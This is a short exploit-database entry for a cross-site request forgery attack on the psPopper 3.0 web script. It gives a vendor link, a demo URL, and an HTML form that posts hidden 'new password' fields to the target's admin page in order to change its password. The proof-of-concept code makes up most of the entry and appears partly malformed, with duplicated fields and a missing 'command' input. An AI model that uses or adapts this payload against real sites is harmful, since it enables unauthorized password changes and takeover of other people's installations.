# Exploit Title: psPopper 3.0 CSRF (change password) # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/pspopper-popup-window-controller/6788/ # Category:: webapps # Demo : http://www.cgiscript.net/demo/psPopper/psPopper.php # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form action="http://www.cgiscript.net/demo/psPopper/psPopper.php" method="POST" name="form1"> <input type="hidden" name="new password" class="text"/></td> <input type="hidden" name="new password" class="text"/></td> <input type="button" onclick="document.form1.command.value='cp';document.form1.submit();" value="Save Username/Password" onmouseout="className='button';" onmouseover="className='buttonOver';" class="button"/> </form>